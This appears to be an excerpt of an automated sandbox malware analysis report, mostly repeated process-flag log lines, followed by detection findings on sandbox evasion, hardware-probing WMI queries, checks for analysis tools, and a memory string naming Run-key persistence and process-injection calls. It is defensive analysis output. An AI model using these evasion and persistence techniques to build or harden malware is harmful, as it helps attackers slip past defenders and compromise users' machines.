                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1464
                              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_9-1486
                              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-1161
                              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-1146
                              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-1442
                              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_8-1147
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1148
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-1480
                              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_8-1478
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-1203
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                              Source: msiexec.exe, 0000002B.00000002.2631070003.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKE